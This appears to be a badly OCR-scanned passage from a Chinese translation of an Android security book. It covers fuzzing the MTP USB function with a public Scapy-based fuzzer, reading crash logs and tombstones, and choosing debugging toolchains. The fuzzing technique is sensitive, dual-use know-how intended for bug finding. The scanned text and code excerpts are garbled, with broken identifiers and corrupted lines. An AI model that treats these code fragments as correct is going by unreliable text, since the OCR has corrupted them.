6.5.1 对 USB 进行 模糊 测试 的 挑战 


与 其 他 模糊 测试 一 样 ，USB 设备 的 测试 有 其 自身 的 挑战 。USB 对 输入 的 处 理 一 部 分 在 内 核 
中 ,也 有 一 部 分 在 用 户 空间 中 。 如 果 内 核 在 处 理 时 产生 了 问题 ,那么 内 核 会 报错 ,并 且 会 让 设备 
重启 或 中 止 运行 。 而 如 果 用 户 空间 中 实现 某 项 功能 的 程序 出 错 ， 那 么 很 可 能 会 导致 程序 月 省。 
USB 设备 在 发 生 错误 时 会 发 送 一 个 总 线 重 置信 号 , 即 设备 会 从 主机 断 开 连接 , 并 将 自身 重 置 回 默 
认 设 置 。 遗憾 的 是 , 重 置 设备 会 断 开 所 有 正在 使 用 的 USB 功能 , 包括 用 来 监视 日 志 的 ADB 会 话 。 
因此 ， 如 果 要 实现 自动 化 测试 ， 就 需要 额外 的 检测 和 处 理 这些 可 能 发 生 的 问题 。 

幸好 Android 在 多 数 情况 下 十 分 健壮 ， 服 务 通 常会 自动 重启 。 为 了 在 系统 内 核 出 错 或 中 止 时 
能 够 重启 ，Android 设备 使 用 了 看 门 狗 。 因 此 大 部 分 情况 下 ， 我 们 只 需要 等 待 设备 返回 到 之 前 的 
状态 就 够 了 。 如 果 系 统 并 没有 恢复 ,发 送 一 个 总 线 重 置信 号 一 般 就 可 以 解决 问题 了 。 不过, 在 非 
常 罕见 的 情况 下 , 需要 物理 重新 连接 或 者 给 设备 重新 上 电 来 清除 错误 。 当 然 , 这 种 任务 也 能 完全 
自动 化 ,但 需要 一 些 特殊 的 硬件 ， 如 支持 软件 控制 或 自 定义 电源 控制 的 USB 集线器 。 这 些 方 法 
不 在 本 童 所 讨论 的 范围 内 。 

虽然 对 USB 设备 进行 模糊 测试 有 其 自身 的 挑战 , 但 大 体 上 的 步骤 与 其 他 模糊 测试 是 一 样 的 。 
相 比 同时 测试 USB 的 所 有 功能 ， 一 次 对 一 个 功能 进行 模糊 测试 会 得 到 更 好 的 结果 。 正 如 应 用 可 
以 在 两 台 计算 机 之 间 通 过 网 络 进行 通信 那样 ， 使 用 USB 传输 的 应 用 也 有 自己 的 通信 协议 。 













































































































































































6.5.2” 选 定 目标 模式 


USB 接口 可 以 处 于 很 多 不 同 的 模式 , 从 中 选择 一 种 来 进行 模糊 测试 并 不 容易 。 另 外 , Android 
设备 处 于 不 同 的 模式 时 ， 所 暴露 的 功能 是 不 同 的 ， 换 名 话说 ， 一 种 模式 暴露 一 个 功能 集合 ， 而 另 
一 种 模式 则 暴露 另 一 个 功能 集合 。 把 设备 接 人 USB 主机 的 时 候 我 们 就 很 容易 看 到 这 一 点 。 刚 接 
和 人 时 会 弹出 一 条 消息 ， 显 示 出 当前 的 模式 ， 并 引导 用 户 去 点 击 更 改选 项 。 具 体 支持 哪些 功能 因 设 
备 的 不 同 而 不 同 。 图 6-3 显示 了 搭载 Android 4.4 系统 的 Nexus 4 接 人 USB 主机 时 的 提示 消息 。 
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中 (@lojalalsloltslo :Wntsle ll Wolo 








图 6-3 ”连接 USB 时 的 提示 消息 


点 击 提示 消息 之 后 ， 用 户 被 引导 至 图 6-4 所 示 的 界面 。 





了 USB computer connection 
CONNECT AS 


Media device (MTP) 
Lets you tre 


file 


or 
Ipport MTP 





图 6-4 USB 模式 选择 


单 从 图 6-4 来 看 ，Nexus 4 的 默认 模式 似乎 并 不 多 ， 但 实际 上 ， 很 多 其 他 功能 (如 USB 网 络 
共享 等 ) 系统 也 是 支持 的 ， 只 是 需要 在 一 些 特殊 的 启动 中 显 式 地 打开 或 设置 。 图 6-4 中 的 设备 处 
于 默认 的 配置 状态 ， 多 媒体 设备 (MTP ) 是 Android 设备 出 厂 时 的 默认 功能 ， 因 此 这 是 一 个 极为 
吸引 人 的 模糊 测试 对 象 。 


6.5.3 生成 输入 


选 定 了 要 测试 的 USB 功能 后 ， 下 一 步 就 是 了 解 尽 可 能 多 的 相关 信息 。 目 前 为 止 ， 我 们 只 知 
道 Android 设备 把 这 个 功能 称 为 “多 媒体 设备 ”( MTP )。 查 阅 MTP 这 个 缩写 可 以 发 现 它 代表 多 
媒体 传输 协议 (Media Transfer Protocol ), 进一步 调研 得 知 , MTP 是 一 个 基于 图 片 传输 协议 (PTP ) 
的 协议 。 再 进一步 搜索 “MTP fuzzing”, 就 能 找到 对 MTP 进行 模糊 测试 的 公开 工具 。Olle Segerdahl 
开发 了 这 个 工具 ,并 在 2012 年 于 芬兰 举行 的 T2 Infosec 大 会 上 发 布 ,这 个 工具 可 以 从 https://github. 
com/ollseg/usb-device-fuzzing.git 下 载 到 。 本 节余 下 部 分 将 介绍 这 个 工具 如 何 生 成 输入 并 处 理 输入 。 

深入 分 析 Olle 的 USB 设备 模糊 测试 工具 后 发 现 ， 它 使 用 流行 的 Scapy 包 生 成 工具 来 构建 生 
成 策略 。 这 是 一 个 很 好 的 策略 ， 因 为 Scapy 提供 了 很 多 用 来 生成 输入 数据 包 的 接口 ， 这 样 就 能 够 
让 开发 者 专注 于 协议 。 当 然 ，Olle 必须 告诉 Scapy 的 是 MTP 数据 包 的 结构 以 及 协议 的 流程 。 另 
外 ， 他 也 必须 实现 一 些 非 标准 的 处 理 ， 如 数据 和 长 度 字段 的 关系 。 

生成 数据 包 的 代码 在 USBFuzz/MTP.py 文件 中 。 代 码 的 一 开始 包含 了 必要 的 Scapy 组 件 ， 然 
后 Olle 定义 了 两 个 字典 来 保存 MTP 当中 的 操作 和 响应 码 。 接 着 ，Olle 定义 了 一 个 Container 
类 和 两 个 MTP 的 事务 阶段 ( Transaction Phase )。 为 了 让 MTP 服务 知道 如 何 去 解 析 数 据 ， 所 有 的 
MTP 事务 都 以 容器 作为 前 级 。container 类 在 PTP 规范 中 有 描述 ， 相 关 代码 如 下 : 
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98 class Container (Packet) : 





99 name = "PTP/MTP Container " 
100 
OT _Types = {"Undefined":0, "Operation":1, "Data":2, "Response":3, 
"Event":4} 
102 
103 _Codes = {} 
104 _Codes.update (OpCodes) 
105 _Codes.update (ResCodes) 
106 fields_desc = [ LEIntField("Length", None), 
107 LEShortEnumField("Type", 1, _Types), 
108 LEShortEnumField("Code", None, _Codes), 
109 LEINntField("TransactionID", None) ] 





类 描述 了 PTP 和 MTP 所 采用 容器 的 结构 。 由 于 使 用 了 Scapy， 这 个 类 只 需要 定义 
fields_desc, 然后 ee 从 以 上 源码 中 可 以 
看 到 ，container 包 包 含 字段 : 长 度 Chongth), 类 型 (Type )、 编 号 ( Code ) 和 事务 标识 
(TransactionID )。 0 Containter 类 包含 了 一 个 post_builg 国 数 。post_build 
函数 处 理 了 两 件 事 情 ， 首 先 ， 从 载荷 中 将 编号 和 事务 标识 复制 出 来 ,这 里 面 会 包含 两 种 包 类 型 中 
的 一 种 ， 后 面 会 详细 讨论 ; 其 次 ，post_puila 函数 基于 载荷 的 长 度 来 更 新 长 度 字段 。 

Olle 又 定义 了 两 个 对 象 operation 和 Response， 用 来 描述 两 种 类 型 的 包 。 这 些 数据 包 就 
是 container 对 象 的 载 倚 。 两 种 包 拥 有 相同 的 结构 ， 仅 仅 编号 字段 不 同 。 相 关 代码 如 下 : 


127 class Operation (Packet): 





















































128 name = "Operation " 
上 六 对 fields_desc = [ LEShortEnumField("OpCode", 0, OpCodes), 
130 LEINntField("SessionID", 0), 

| 
143 class Response (Packet ) : 
144 name = "Response " 
145 fields_desc = [ LEShortEnumField("ResCode", 0, ResCodes), 
146 LEINntField("SessionID", 0), 
147 LEINntField("TransactionID", 1), 
148 LEINntField("Parameterl1", 让 
149 LEINntField("Parameter2", 0), 
150 LEINntField("Parameter3", 0), 
于 与 二 LEINntField("Parameter4", 0), 

152 LEINntField("Parameter5", 0) ] 





两 种 数据 包 代 表 了 4 种 MTP 会 话 类 型 中 最 重要 的 两 种 ， 对 于 operation 事务 可 以 从 
pCodes 字典 中 根据 opcode 字段 来 选择 ，Response 事务 则 使 用 Rescodes 字典 。 

虽然 这 些 对 象 描述 了 模糊 测试 工具 所 用 到 的 数据 包 格 式 ， 但 是 并 没有 实现 整个 输入 生成 过 
程 。Olle 在 examples/mtp_fuzzer.py 文件 中 实现 了 输入 生成 的 剩余 部 分 ， 代 码 如 下 : 





O 





trangs: Struct unpack(”"I”, OguUrandom(d4)) {01 

3 了 32 re Stract unpack("H", 08, Urandom't2) [0] 

33 opcode = OpCodes.items() [zxglen(Oopcodes)][1] 

34 if opcode == OpCodes["CloseSession"]: 

35 opcode = 0 

36 cmd = Container()/fuzz (Operation (OpCode=opcode, 


TransactionID=trans, SessionID=dev.current_session())) 
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第 31 行 ~ 第 33 行 随机 挑选 了 一 种 MTP 事务 类 型 及 其 操作 码 。 第 34 行 和 第 35 行 处 理 了 随机 
得 到 closesession 这 种 特殊 操作 的 情形 ， 因 为 如 果 会 话 被 关闭 ， 模 糊 测试 工具 就 无 法 测试 要 
求 开放 会 话 的 任何 底层 代码 了 。 最 后 , 第 36 行 创建 了 请 求 包 。 代码 中 Scapy 的 fuzz 函数 会 往 包 
的 各 个 字段 中 填 上 随机 值 。 到 此 ， 输 入 已 经 生成 完毕 ， 可 以 发 送 到 目标 设备 了 。 


6.5.4 ”处 理 输入 


MTP 规范 中 描述 了 发 起 方 〈Initiator ) 和 响应 方 (Responder ) 在 协议 流 中 的 角色 。 正 如 大 
多 数 USB 设备 的 通信 一 样 ， 主 机 是 发 起 方 ， 设 备 是 响应 方 。Olle 的 工具 反复 发 送 Operation 包 ， 
然后 读 取 Response 包 。 他 使 用 了 PyUSB 这 一 基于 libusb 的 Python 通信 库 。PyUSB 提供 的 API 
非常 简洁 易 用 。 

Olle 首先 创建 了 一 个 MTPDevice 类 ,你 可 以 在 USBFuzz/MTP.py 中 找到 。 这 个 类 继承 自 
PyUSB 的 BulkPipe 类 ,顾名思义 ，BulkPipe 类 用 于 USB 的 Bulk Pipe。 除 开 一 些 基于 时 间 的 
选项 ， 这 个 类 需要 目标 设备 的 Vendor Id 和 Product1d。 连 接 建 立 之 后 ， 大 多 数 功 能 是 关于 监视 而 
不 是 传递 输入 的 。 因 此 我 们 会 在 6.5.5 节 讨 论 它 。 

回 到 examples/mtp_fuzz.py 这 个 文件 中 ，Olle 实现 了 剩余 的 代码 ， 如 下 所 示 : 

16 s = dev.new_session() 

17 cmd = Container()/Operation(OpCode=OpCodes["OpenSession"], 
Parameterl1=s) 

18 cmd.show2() 

19 dev.send (cmd) 

20 response = dev.read_ response() 

[ss 3 

27 while True: 

[Sd 


38 dev.send (cmd) 
39 response = dev.read response (trans) 


第 16 行 ~ 第 20 行 用 于 开启 与 MTP 设备 的 会 话 。 这 个 过 程 包括 发 送 一 个 设置 了 OpenSession 
操作 码 的 Operation 包 , 以 及 读 取 Response 包 。 第 38 行 和 第 39 行 就 是 完成 输入 传递 的 所 有 代码 。 
相 比 其 他 模糊 测试 ， 典 型 的 USB 主 从 结构 使 得 处 理 输 入 这 一 步 变 得 非常 简单 。 现 在 只 剩 下 监控 
异常 行为 这 一 步 了 。 
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6.5.5 监控 测试 


大 多 数 USB 设备 几乎 都 没有 给 出 监视 设备 内 部 行为 的 方法 ,但 是 Android 设备 并 非 如 此 ， 
使 用 Android 自 带 的 监视 机 制 是 非常 容易 的 。 本 章 前 面 所 讨论 的 方法 依然 可 以 很 好 地 工作 。 当然 ， 
6.5.1 节 中 提 到 的 设备 可 能 会 被 重 置 或 停止 响应 这 一 问题 ， 还 是 需要 特别 处 理 。 

Olle 的 USB 模糊 测试 工具 在 设备 端 并 没有 做 任何 监视 设备 的 工作 ， 这 并 不 奇怪 ， 因 为 他 的 
开发 工作 并 不 是 针对 Android 设备 的 。 不 过 Olle 实现 了 在 主机 端 监视 设备 。MTPDevice 类 实现 
了 一 个 叫 作 is_alive 的 方法 ， 用 来 监视 设备 是 否 可 以 响应 。 在 实现 中 ，Olle 使 用 了 BulkPipe 
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类 来 检测 设备 的 会 话 是 否 还 保持 通畅 。 他 使 用 自 定义 的 事务 标识 0xdeadbeef， 发 送 了 一 个 Skip 
Operation 数据 包 ， 如 果 能 够 收 到 错误 反馈 ， 那 么 就 意味 着 设备 响应 正常 。 

在 模糊 测试 工具 核心 代码 examples/mtp_fuzzer.py 中 ，Olle 首先 重 置 设备 ， 这 样 就 可 以 认为 
设备 处 于 一 个 正常 状态 。 然后 进入 一 个 主 循环 进行 交互 , 每 次 交互 完 调用 is_alive 方法 来 判断 
状态 。 一 旦 设备 无 响应 , 则 重 置 设备 到 可 用 的 状态 。 采 用 这 种 方式 可 以 让 模糊 测试 工具 持续 运行 
很 长 的 时 间 。 但 是 ,在 Android 设 备 上 跑 这 个 工具 还 差 一 些 , 除了 is_alive 外 ，Olle 也 打印 了 
发 出 去 的 operation 和 收 到 的 Response 包 。 这 会 帮助 我 们 及 时 发 现 问题 所 在 ， 但 这 种 方案 并 
不 完美 。 特 别 是 ， 通 过 这 种 方法 我 们 难以 重 放 输入 ， 而 且 难 以 将 输入 和 前 省 关联 起 来 。 

当 把 这 个 模糊 测试 工具 用 于 Andoid 设备 时 ， 监 视 Android 的 系统 日 志 会 得 到 更 好 的 反馈 结 
果 。 但 现在 我 们 依然 需要 解决 设备 频繁 重 置 问题 ， 好 在 使 用 下 面 的 命令 就 可 以 轻松 解决 。 


dev:~/android/usb-device-fuzzing $ while true; do adb wait-for-device \ 
logcat; done 
[.. log output here ..] 


通过 上 面 的 命令 ， 我们 就 可 以 看 到 MtpServer 在 设备 上 运行 时 所 记录 的 调试 信息 了 。 就 像 对 
Chrome 进行 模糊 测试 那样 ,实时 监控 系统 日 志 当 中 的 错误 消息 , 可 以 发 现 哪 些 协 议 是 不 支持 的 。 
注释 掉 它们 会 提高 测试 的 效率 ， 而 且 也 不 影响 发 现 漏洞 。 

当 我 们 在 搭载 Android 4.4 系统 的 2012 版 Nexus 7 上 运行 模糊 测试 工具 时 ， 只 花 了 几 分 钟 就 
找到 了 一 个 崩溃 。 下 面 是 MtpServer 线程 月 泪 时 所 记录 的 消息 : 


Fatal signal 11 (SIGSEGV) at 0x66f9f002 (code=1), thread 413 (MtpServer) 


让 




































































Build fingerprint: 'google/nakasi/grouper:4.4/KRT160/907817:user/release- 
keys' 
Revision: '0' 
pid: 398, tid: 413, name: MtpServer >>> android.process.media <<< 
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 66f9f002 
r0 5a3adb58 rl 66f92008 rr2 66f9f000 rr3 0000cff8 
r4 66fa2dd8 r5 000033fb rr6 5a3adb58 r7 00009820 
r8 220b0ff6 r9 63ccbef0 sl 63ccclc4 fp 63ccbef0 
ip 63cc3all sp 6a8e3a8c lr 63cc3fc9 pc 63cc3d2a cpsr 000f0030 


仔细 观察 发 现 这 个 表 溃 影响 并 不 大 ， 但 是 表 溃 的 速度 如 此 之 快 预示 着 MTP 的 实现 当中 可 能 
隐藏 着 其 他 问题 。 

对 MtpServer、USB 协议 和 设备 等 的 模糊 测试 留 给 有 兴趣 的 读者 去 完成 。 总 的 来 看 ， 这 一 节 
表明 ， 即 便 使 用 公开 的 模糊 测试 工具 ， 也 能 在 Android 中 找到 bug。 





























6.6 小结 


本 章 提 供 了 在 Android 上 进行 模糊 测试 所 需 的 所 有 信息 ， 从 高 层面 上 介绍 了 模糊 测试 的 4 个 
步 又， 即 选 定 目标 、 生 成 测试 输入 、 处 理 输入 和 监控 蜡 常 行为 。 本 章 还 介绍 了 对 Android 进行 模 
糊 测 试 有 哪些 优势 和 挑战 。 
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注意 第 11 章 有 更 多 对 Android 短 消 息 作 模糊 测试 的 内 容 。 

















本 章 完成 了 3 个 模糊 测试 工具 的 深入 讨论 ,前 两 个 是 专门 为 本 章 设计 的 , 最 后 一 个 是 将 公 
的 工具 迁移 到 Android 设备 上 。 每 个 例子 中 ,模糊 测试 工具 都 能 找到 底层 代码 中 的 问题 ,这 也 能 
说 明 模 糊 测试 是 一 种 发 现 Android 设备 中 bug 和 安全 漏洞 的 有 效 手 段 。 

下 一 章 会 介绍 如 何 使 用 调试 和 漏洞 分 析 技 术 来 深入 理解 漏洞 , 这 能 帮助 你 从 模糊 测试 的 结果 
中 去 收获 一 些 安全 漏洞 ， 为 开发 可 行 的 漏洞 利用 代码 做 铺垫 。 
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想 要 编写 一 个 完全 没有 安全 漏洞 的 程序 相当 困难 , 甚至 是 不 可 能 的 。 不管 你 的 目标 是 修补 还 
是 利用 漏洞 ,使 用 调试 工具 和 技术 是 最 好 的 方式 。 研 究 者 可 以 用 调试 器 来 观测 程序 运行 时 的 状态 ， 
验证 数据 流 ， 捕捉 值 得 关注 的 程序 状态 , 或 者 在 运行 时 修改 它们 的 行为 。 在 信息 安全 工业 界 , 调 
试 器 在 分 析 漏 洞 的 成 因 和 判断 漏洞 严重 性 等 方面 ， 都 是 必 不 可 少 的 工具 。 

本 章 将 带领 大 家 探索 各 种 Android 操作 系统 的 调试 工具 ,引导 大 家 通过 配置 调试 环境 来 获得 
最 高 的 调试 效率 。 我 们 会 使 用 一 些 样 例 代 码 和 真实 漏洞 来 介绍 调试 的 整个 过 程 , 教 你 如 何 分 析 崩 
沉 、 判 断 漏洞 的 成 因 和 可 利用 性 。 


7.1 获取 所 有 信息 


想 要 成 功 地 调试 或 分 析 漏 洞 , 第 一 步 是 收集 所 有 相关 信息 , 例如 文档 、 源 代码 、 二 进 制 文件 、 
符号 文件 以 及 可 用 的 工具 等 。 本 节 会 告诉 你 为 什么 这 些 信息 如 此 重要 , 以 及 如 何 使 用 它们 来 提高 
调试 效率 。 

要 去 寻找 目标 相关 的 协议 、 支 持 的 文件 格式 等 文档 , 因为 了 解 的 越 多 ,获得 成 功 的 概率 也 就 
越 大 。 如 果 能 在 分 析 过 程 中 随时 使 用 这 些 文档 ， 会 迅速 解决 意 想 不 到 的 困难 。 





























交叉 引用 关于 如 何 获取 各 种 Android 设备 的 源 代码 ， 请 参照 附录 B。 























在 分 析 过 程 中 , 分 析 对 象 的 源 代码 是 无 价 之 宝 。 比 起 逆向 宛 长 的 汇编 代码 , 阅读 源 代码 的 效率 
要 高 很 多 。 更 重要 的 是 ， 如 果 拥 有 源 代码 ， 就 可 以 将 目标 重新 编译 成 带 符号 的 版 本 。7.6.5 节 会 介 
绍 , 拥有 符号 可 以 实现 源 代码 级 调试 。 如 果 无 法 得 到 调试 对 象 的 源 代码 , 可 以 试 着 去 寻找 一 些 竞争 
对 手 产品 、 衍 生产 品 或 者 老 版 本 的 代码 , 尽管 这 些 代码 有 可 能 与 汇编 不 一 致 。 即 便 不 同 编程 人 员 的 
编码 风格 差异 较 大 ， 也 很 可 能 会 用 相同 的 方法 处 理 问题 。 所 以 ， 每 个 细节 信息 都 可 能 会 有 所 帮助 。 

二 进 制 文件 也 很 有 用 ， 原 因 有 二 。 首 先 ， 某 些 设 备 中 的 二 进 制 文件 可 能 包含 部 分 符号 。 符 号 
会 提供 有 用 的 信息 ， 例 如 函数 名 、 参 数 名 称 和 类 型 等 ， 这 是 源 代 码 和 二 进 制 文件 的 最 大 区 别 。 其 
次 ,即便 没有 符号 ， 二进制 文件 也 能 提供 程序 的 脉络 。 使 用 静态 分 析 工具 去 逆向 分 析 二 进 制 文件 
依然 会 获得 十 分 有 用 的 信息 。 例 如 , 反 汇 编 器 可 以 重 构 数 据 流 和 控制 流 ， 这 样 可 以 基于 控制 流 来 
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浏览 程序 ， 在 调试 的 时 候 找 到 方向 ， 并 发 现 程序 中 一 些 有 趣 的 点 。 

与 x86 系统 相 比 ，ARM 系统 中 的 符号 信息 更 为 重要 。 正 如 第 9 章 所 讨论 的 ，ARM 处 理 器 有 
好 几 种 执行 模式 ， 所 以 ARM 系统 中 的 符号 不 仅 可 以 确定 名 称 和 类 型 ， 还 能 用 来 确定 在 执行 函数 
时 处 理 器 所 处 的 模式 。 此 外 ，ARM 处 理 器 经 常 把 一 些 只 读 的 常量 存储 在 代码 之 后 ， 所 以 符号 也 
可 以 帮助 找到 这 些 常量 数据 。 这 些 特殊 类 型 的 符号 在 调试 的 时 候 显得 尤为 重要 。 在 调试 中 查看 栈 
回溯 信息 或 者 插入 断 点 时 ， 如 果 没 有 符号 ， 调 试 器 就 会 出 现 问题 。 例 如 ， 在 不 同 处 理 器 模式 下 ， 
插入 断 点 的 指令 是 不 同 的 。 如 果 弄 错 了 模式 ， 就 会 导致 程序 崩 演 或 错过 断 点 ， 其 至 调试 器 朋 演 。 
基于 这 些 原因 ， 在 调试 Android 上 的 ARM 二 进 制 程序 时 ， 符 号 是 最 宝贵 的 资源 。 
找到 正确 的 工具 往往 会 让 工作 变 得 更 加 容易 。 反 汇编 器 (如 IDA Pro 和 radare2 ) 提供 了 一 个 
二 进 制 指令 的 视窗 。 大 多 数 反 汇 编 器 支持 插件 或 者 脚本 形式 的 扩展 。 例 如 ，IDA Pro 有 一 个 插件 
应 用 程序 编程 接口 (API ) 和 两 种 脚本 引擎 (IDC 和 Python )，radare2 也 提供 了 若干 编程 语言 的 
绑 定 (binding )。 事 实证 明 ， 这 些 用 于 扩展 反 汇 编 器 的 工具 在 漏洞 分 析 中 是 不 可 或 缺 的 ， 特 别 是 
在 无 法 得 到 符号 时 。 针 对 一 些 特 定 的 目标 程序 , 也 可 以 使 用 其 他 工具 , 例如 监视 网 络 、 文 件 系统 、 
系统 调用 或 者 API 的 工具 。 它 们 能 为 程序 执行 提供 很 多 有 价值 的 视角 。 


7.2 选择 一 套 工具 链 


工具 链 ( toolchain ) 就 是 开发 产品 所 用 到 的 一 系列 工具 。 通 常 ， 一 套 工 具 链 包 含 编译 器 、 连 
接 器 、 调 试 器 ， 以 及 任何 必要 的 系统 库 。 简 单 来 说 ,构建 或 者 选择 一 套 工具 链 是 进行 代码 开发 的 
首要 步 又。 针对 本 章 的 目标 ， 调 试 器 当然 是 最 重要 的 部 分 ， 但 也 需要 选择 相应 的 可 用 工具 链 。 

对 于 Android， 设 备 制 造 商 通常 在 某 种 设备 的 开发 过 程 中 挑选 一 套 工具 链 。 研 究 人 员 调 试 编 
译 所 产生 的 程序 , 而 工具 链 的 选择 对 此 过 程 则 有 着 直接 的 影响 作用 ,每 一 套 工 具 链 都 有 相应 版 本 ， 
相同 工具 链 的 不 同 版 本 互 不 兼容 。 例 如 ， 版 本 A 的 调试 器 可 能 无 法 调试 版 本 B 的 编译 器 所 编译 
出 的 程序 ， 甚 至 可 能 导致 月 溃 。 此 外 ， 很 多 工具 链 还 有 各 种 各 样 的 bug。 为 了 尽 可 能 避免 兼容 性 
问题 ， 推 荐 使 用 与 厂商 相同 的 工具 链 。 不 过 ， 判 断 厂商 使 用 哪 一 套 工具 链 却 并 非 易 事 。 

在 Android 和 ARM Linux 生态 系统 中 ,有 很 多 调试 器 可 供 选 择 , 不 仅 有 开源 项 目 , 也 有 商业 
产品 。 表 7-1 列举 了 一 些 支 持 ARM Linux 的 调试 工具 。 


表 7-1 支持 ARM Linux 的 调试 工具 







































































































































































































































































工 具 描 述 
IDA Pro IDA Pro 是 一 个 商业 反 汇 编 器 ， 其 中 包含 一 个 Android 上 的 远程 调试 器 
Debootstrap 由 Debian 项 目 维护 ， 这 个 工具 让 GNU 调试 器 (GDB) 可 以 在 设备 上 使 用 
Linaro Linaro 为 从 姜 饼 开始 的 Android 版 本 提供 了 工具 链 
RVDS ARM 的 官方 编译 工具 链 ， 是 商业 版 工具 ， 但 是 开放 了 评估 版 
Sourcery 前 身 为 Sourcery G++，Mentor Graphics 公司 的 工具 链 ， 分 为 评估 版 、 商 业 版 和 轻 量 版 
Android NDK Android 官方 的 原生 开发 工具 套装 (NDK) ,开发 者 可 以 在 应 用 中 使 用 原生 语言 














AOSP Prebuilt AOSP 仓库 包含 预 编 译 好 的 工具 链 ， 用 来 编译 AOSP 固件 
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在 编写 本 书 的 过 程 中 ， 笔 者 测试 了 上 面 的 一 些 工具 ，IDA 的 android_server，Debootstrap 的 














GDB 包 , Android NDK 调试 器 , 以 及 AOSP 中 的 调试 右 。 最 后 两 个 调试 器 将 在 7.6 节 中 详细 介绍 。 


我 们 








使 用 AOSP 预 编译 工具 链 配 合 AOSP 所 支持 的 Nexus 设备 时 得 到 的 效果 最 好 。 当然 也 需要 看 








使 用 者 的 自身 喜好 。 


7.3 


也 可 


调试 衣 溃 Dump 

















系统 日 志 是 最 简单 的 Android 调试 工具 ,只 需 在 设备 上 运行 logcat 命令 就 能 访问 系统 日 志 ， 
以 使 用 Android 调试 桥 (ADB ) 来 运行 1ogcat 命令 。 第 2 章 已 经 介绍 了 这 一 工具 ， 并且 在 





第 4 章 和 第 6 章 中 用 来 观测 各 种 系统 事件 .监视 系统 日 志 可 以 获得 实时 反馈 ,包括 异常 .表演 dump 


等 。 


7.3. 


出 了 





我 们 强烈 建议 ,无 论 在 Android 设备 上 进行 测试 还 是 调试 ， 都 应 当 监视 系统 日 志 。 


1 系统 日 志 


当 Dalvik 或 者 Android 框架 层 应 用 发 生 异 常 时 , 异常 的 细节 信息 将 被 写 人 系统 日 志 。 下 面 列 
摩托 罗拉 Droid 3 手机 发 生 异常 时 的 系统 日 志 。 


D/AndroidRuntime: Shutting down VM 

W/dalvikvm: threadid=1: thread exiting with uncaught exception 

(group=0x4001e560) 

E/AndroidRuntime: FATAL EXCEPTION: main 
E/AndroidRuntime: java.lang.RuntimeException: Error receiving broadcast 

Intent 

{ act=android.intent.action.MEDIA MOUNTED dat=file:///sdcard/nosuchfile } 


in 
com.motorola.usb.UsbService$1@40522c10 











E/AndroidRuntime: at android.app.LoadedApks$sReceiverDispatchers$sArgs. 
run 

(LoadedApk .java:722) 

E/AndroidRuntime: at android.os.Handler.handleCallback (Handler. 
java:587) 

E/AndroidRuntime: at android.os.Handler.dispatchMessage (Handler. 
java:92) 

E/AndroidRuntime: at android.os.Looper.loop (Looper.java:130) 
E/AndroidRuntime: at 

android.app.ActivityThread.main (ActivityThread.java:3821) 
E/AndroidRuntime: at java.lang.reflect.Method.invokeNative (Native 
Method) 

E/AndroidRuntime: at java.lang.reflect.Method.invoke (Method. 
java:507) 

E/AndroidRuntime: at 


com.android.internal.os.ZygoteInits$MethodAndArgsCaller.run 
(ZygoteInit.java:839) 


E/AndroidRuntime: at 
com.android.internal.os.ZygoteInit.main(ZygoteInit.java:597) 
E/AndroidRuntime: at dalvik.system.NativeStart.main (Native Method) 


E/AndroidRuntime: Caused by: java.lang.ArrayIndexOutOfBoundsException 
E/AndroidRuntime: at java.util.ArrayList.get (ArrayList.java:313) 
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E/AndroidRuntime: at com.motorola.usb.UsbService.onMediaMounted 
(UsbService.java:624) 

E/AndroidRuntime: at 

com.motorola.usb.UsbService.access$1100 (UsbService.java:54) 
E/AndroidRuntime: at 

com.motorola.usb.UsbServices$1.onReceive (UsbService.java:384) 
E/AndroidRuntime: at android.app.LoadedApk$ReceiverDispatchersArgs. 
run 

(LoadedApk .java:709) 

E/AndroidRuntime: ... 9 more 





在 这 个 例子 中 ， 当 系统 收 到 MEDIA_MOUNTED 的 Intent 时 ， 引 发 了 运行 时 错误 Runtime 
Exception。Intent 由 com.motorola.usb.UsbService 这 个 Broadcast Receiver 处 理 。 通 过 调 
用 栈 信息 \ 可 以 看 出 函数 ES 中 发 生 了 数组 越界 异常 ArrayIndexOutOfBounds 
Exception， 这 是 因为 统一 资源 定位 符 ( URI ) file:///sdcard/nosuchfile 对 应 的 文件 并 不 存在 。 从 
第 三 行 可 以 看 到 ， 发 生 的 错误 导致 了 服务 终止 














7.3.2 Tombstone 


当 Android 平 台 上 的 原生 代码 月 演 时 ,调试 器 守护 进程 准备 了 一 份 简单 的 骨 演 报告 ,并 将 其 
写 入 系统 日 志 。 此 外 ,调试 器 守护 进程 将 月 演 报 告 保存 成 名 为 tombstone 的 文件 。 在 大 部 分 手机 
设备 上 ，tombstone 文件 位 于 /data/tombstones 目录 下 。 由 于 访问 此 目录 及 其 文件 是 受 限 的 ， 读 取 
tombstone 文件 通常 需要 root 权限 。 以 下 摘录 展示 了 一 个 原生 代码 崩 演 日 志 的 简单 示例 : 


255|shell@mako:/ $ ps | lolz 
/system/bin/sh: lolz: not found 
Fatal signal 13 (SIGPIPE) at 0x00001303 (code=0), thread 4867 (ps) 


ER 





Build fingerprint: 'google/occam/mako:4.3/JWR66Y/776638:user/relea... 
Revision: '11' 
pid: 4867, tid: 4867, name: ps >>> ps <<< 
signal 13 (SIGPIPE), code -6 (SI_TKILL), fault addr -------- 
r0 ffffffe0 ri b8efe0b8 r2 00001000 r3 00000888 
r4 b6fa9170 r5 b8efe0b8 r6 00001000 rr7 00000004 
r8 bedfd718 r9 00000000 sl 00000000 fp bedfda77 
ip bedfd76c sp bedfd640 lr b6f80dd5 pc b6f7c060 cpsr 200b0010 
d0 75632f7274746120 dl 0000000000000020 
d2 0000000000000020 qd3 0000000000000020 
d4 0000000000000000 qd5 0000000000000000 
d6 0000000000000000 qd7 8af4a6c000000000 
d8 0000000000000000 qd9 0000000000000000 
d10 0000000000000000 al1 0000000000000000 
d12 0000000000000000 al13 0000000000000000 
d14 0000000000000000 al15 0000000000000000 
d16 cidd406de27353f8 di17 3f50624dd2f1la9fc 
Qq18 41c2cfd7db000000 di19 0000000000000000 
d20 0000000000000000 gd21 0000000000000000 
d22 0000000000000000 gd23 0000000000000000 
d24 0000000000000000 gd25 0000000000000000 
d26 0000000000000000 gd27 0000000000000000 
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d28 0000000000000000 gd29 0000000000000000 
d30 0000000000000000 gd31 0000000000000000 
scr 00000010 


backtrace: 
#00 pc 0001pb060 /system/lipb/libc.so (write+12) 
#01 pc 0001fdd3 /system/lib/libc.so (sflush+54) 
#02 pc 0001fe61 /system/lib/libc.so (fflush+60) 
#03 pc 00020cad /system/1lib/libc.so 
#04 pc 00022291 /system/lipb/libc.so 


